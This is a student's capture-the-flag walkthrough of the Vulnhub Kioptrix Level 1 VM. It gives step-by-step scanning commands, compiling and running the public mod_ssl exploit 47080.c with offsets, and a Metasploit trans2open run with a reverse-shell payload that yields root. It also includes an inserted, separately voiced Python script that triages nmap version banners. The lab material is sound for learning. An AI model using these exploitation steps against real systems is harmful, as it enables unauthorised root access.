CTF Challenge: Kioptrix level 1

Koay Yong Cett
9 min read · Jan 1, 2021

This is my first time trying out a Vulnhub machine, and I want to learn as much as possible 💪 😄

Description:

This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.

Goal:

There is a single flag that needs to be acquired in the root user's mailbox.

Download Source:

Download from here 👉 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

SETUP:

Personally, I am using VirtualBox to host both the Kali Linux and Kioptrix Level 1 VMs.

Here are the steps I went through to set up the Kioptrix VM:

  • After downloading the Kioptrix file from the Vulnhub website, create a new VM in VirtualBox and remember to choose "Do not add a virtual hard disk"; the disk will be added later in the VM settings.
  • Click the Create button and wait for the VM to be created and appear in the VM list.
  • Right-click "Kioptrix ver 1.0" and select Settings for the VM.
  • Disable a few unwanted settings for the VM. For instance, uncheck Enable Audio.
  • Next, under the Network pane on the left-hand side, I personally choose the NAT Network type. Of course, other network types such as Bridged Adapter also work.
  • Select the Storage pane on the left-hand side and select Controller: IDE under Storage Devices. Select Add Hard Disk > Choose existing disk > locate and add the Kioptrix vmdk file.
  • After that, click OK to save all the settings just made.
  • Start and boot the VM. If a prompt message appears, you can just select "do nothing" and continue.
  • If the VM boots successfully, you should be able to see this.

DISCOVERY:

  • First, I tried to use netdiscover to find the Kioptrix VM's IP address but failed to do so on the NAT network, so I researched why. (Command: netdiscover -r 10.0.2.0/24; I am using 10.0.2.0/24 because my Kali machine's IP address is 10.0.2.15.)

Reason: Netdiscover uses the Address Resolution Protocol (ARP), which maps IP addresses to MAC addresses. By design, ARP will not cross network boundaries segregated by layer 3 routing or by switch virtual interfaces (SVIs) running at layer 3, because ARP packets are not forwarded by these layer 3 devices.

For Netdiscover to work, you need to configure the virtualized environment to use a Bridged Adapter connection. This allows the ARP packets to reach beyond the local virtualized network boundary.

  • Then I used Nmap to search for the Kioptrix IP address, and it seems that 10.0.2.7 is our target. (Command: nmap 10.0.2.0/24)

DETAIL SCANNING / ENUMERATION:

  • Next, I ran nmap with the -A option, which enables OS detection, version detection, script scanning, and traceroute. (Command: nmap 10.0.2.7 -A)

Here, I found some interesting ports:

· Port 22: old version of SSH

· Ports 80 and 443: The VM hosts a web application

· Port 139: Probably SMB2

  • Then I took a closer look at TCP port 80 with Nikto. Nikto managed to find CVE-2002-0082, which is exploitable to obtain a remote shell. Let's research it in a later step after checking the other options. (Command: nikto -host 10.0.2.7; the port is not stated because port 80 is the default. If you want to specify another port, use -port. For instance: nikto -host 10.0.2.7 -port 443)
  • Then I used nbtscan to reassure myself that the IP address is my target Kioptrix VM. (Command: nbtscan -f 10.0.2.7)
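The enumeration above boils down to comparing banner versions against what is acceptable, and noting where the banner gives no version at all (the Samba service, which later needed a separate scanner). The script below is an added example, not code from the writeup: it parses nmap grepable (-oG) output and triages each open port. The scan text is a constructed sample built from the versions reported above, and the minimum-version baseline is an assumed policy, not a value from the page.

```python
import re

# Defender-side baseline: minimum acceptable (major, minor) per product.
# These numbers are an assumed example policy, not values from the writeup.
MIN_VERSION = {
    "OpenSSH": (7, 0),
    "Apache httpd": (2, 4),
}

# Constructed sample of `nmap -sV -oG -` output for the target scanned above.
# nmap writes "/" inside a field as "|" so the field separator stays unambiguous.
SAMPLE = (
    "# Nmap scan (constructed sample, not a real capture)\n"
    "Host: 10.0.2.7 ()\tStatus: Up\n"
    "Host: 10.0.2.7 ()\tPorts: "
    "22/open/tcp//ssh//OpenSSH 2.9p2 (protocol 1.99)/, "
    "80/open/tcp//http//Apache httpd 1.3.20 ((Unix) mod_ssl 2.8.7)/, "
    "139/open/tcp//netbios-ssn//Samba smbd (workgroup: MYGROUP)/, "
    "443/open/tcp//ssl|https//Apache httpd 1.3.20 ((Unix) mod_ssl 2.8.7)/\n"
)

def parse_ports(grepable):
    """Yield (port, state, service, version) for each entry in the Ports: field."""
    for line in grepable.splitlines():
        m = re.search(r"\tPorts: (.*)", line)
        if not m:
            continue
        for entry in m.group(1).split(", "):
            f = entry.split("/")  # port/state/proto/owner/service/rpc/version/
            if len(f) < 7:
                continue
            yield int(f[0]), f[1], f[4], f[6]

def triage(grepable, policy=MIN_VERSION):
    """Classify each open port as below_baseline, ok, or unidentified."""
    findings = []
    for port, state, service, version in parse_ports(grepable):
        if state != "open":
            continue
        product = next((p for p in policy if version.startswith(p)), None)
        ver = re.search(r"(\d+)\.(\d+)", version[len(product):]) if product else None
        if product is None or ver is None:
            # Banner gave no usable version (Samba here): needs a follow-up check.
            status = "unidentified"
        elif (int(ver.group(1)), int(ver.group(2))) < policy[product]:
            status = "below_baseline"
        else:
            status = "ok"
        findings.append({"port": port, "service": service,
                         "version": version, "status": status})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f['port']:>5}/tcp {f['status']:<15} {f['version']}")
```

Port 139 comes back as "unidentified" rather than "ok", which is exactly the gap that the later smb_version scan has to fill.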

WEB SCAN:

  • Both the HTTP and HTTPS sites are just the default Apache landing pages, so nothing valuable can be found there. Let's run dirb to see what we can find. (Command: dirb http://10.0.2.7)

Three directories were found:

· http://10.0.2.7/manual/

· http://10.0.2.7/mrtg/

· http://10.0.2.7/usage/

  • Then I searched for files with the .php and .html extensions. (Command: dirb http://10.0.2.7 -X .php,.html)
  • The results of the two dirb scans show that both test.php and the mrtg directory look promising.
  • Well, this is disappointing: given that we get the PHP source back, the PHP handler is probably not set up properly on the Apache server. (Command: curl http://10.0.2.7/test.php)
  • It seems I am able to reach the Multi Router Traffic Grapher (MRTG) application. Let's see if we can find any exploits for it.
  • Unfortunately, searchsploit is not able to find any exploits for MRTG.
  • I searched CVE Details and found two. However, neither CVE matches the MRTG version found earlier, and they do not seem to work on this system. Time to move on.

SMB:

  • I used enum4linux to enumerate the SMB service. However, it returned an error. (Command: enum4linux -a 10.0.2.7)
  • So I used the Metasploit scanner to find the SMB version. Now I have the Samba version and can research it later. (Commands: msfconsole, use auxiliary/scanner/smb/smb_version, set rhost 10.0.2.7, run)

Exploiting OpenSSH:

  • I found these two exploits for OpenSSH version 2.9p2 but couldn't figure out how to use them, so I moved on. (Command: searchsploit "openssh")

Exploiting Apache:

  • After reviewing the findings from Nikto, it was determined that CVE-2002-0082 exists and is exploitable to produce a remote shell. I was able to find 3 exploits in searchsploit, so I picked the latest one. With -w, I can look at the code by clicking on the link. (Command: searchsploit "mod_ssl 2.8.7")
  • The Exploit Database link and related information are shown when I click on the link provided.
  • Next, I exited the root shell and copied the needed exploit (47080.c) into the directory (home/kali) where I compile and run the code. (Command: cp /usr/share/exploitdb/exploits/unix/remote/47080.c home/kali) The path of the exploit is shown in the searchsploit results.
  • Install the ssl-dev library and compile it. If the ssl-dev library is not installed, an error will appear. (Commands: sudo apt-get install libssl-dev, gcc -o OpenFuck 47080.c -lcrypto)
  • Run the exploit and see which supported offset is suitable for Apache 1.3.20. But the list is a bit too long to read. (Command: ./OpenFuck)
  • The Apache version is found with the grep command, which is much easier. (Command: ./OpenFuck | grep 1.3.20)
  • Based on the Goodbye message, this hex value fails to obtain a shell. Let's try another one. (Command: ./OpenFuck 0x6a 10.0.2.7)
  • After trying the second offset, I got a shell with root access. However, sometimes I need to retry the command a few times for it to work. (Command: ./OpenFuck 0x6b 10.0.2.7)

Exploiting with SMB:

  • Researching the Samba version on the cvedetails website and with the searchsploit command, I found a Metasploit module for CVE-2003-0201.
  • Open Metasploit and find the exploit. (Command: search cve:2003-0201) Then use the trans2open exploit. (Command: use exploit/linux/samba/trans2open)
  • Set rhost to the target machine. (Command: set rhost 10.0.2.7)
  • There was an issue opening the session when I ran it. After some research, it seems a payload is required. (Command: run)
  • Since the remote server appears to be a Linux x86 OS, an x86 reverse shell payload is used. (Command: set payload linux/x86/shell_reverse_tcp)
  • A successful shell with root access. (Command: run)

CAPTURE THE FLAG:

  • Continuing after obtaining root access, no flag is found in the root folder. (Commands: cd /root, ls -al)
  • No luck with the locate command either. (Command: locate flag)
  • Let's check .bash_history to see what information exists in it. (Command: cat .bash_history)
  • The mail command looks interesting. The unread mail looks interesting and talks about level 2. (Command: mail)
  • Root flag obtained; press q to exit the mail. (Command: 1)

Done

Thanks for reading my story. Feel free to refer to other sources; all of this is based on my personal opinion and experience. Thanks 😄

Koay Yong Cett

A Bachelor of CS student majoring in Network Security (UniSZA). Every story I share is based on my personal opinion. Thank you. Currently doing my internship.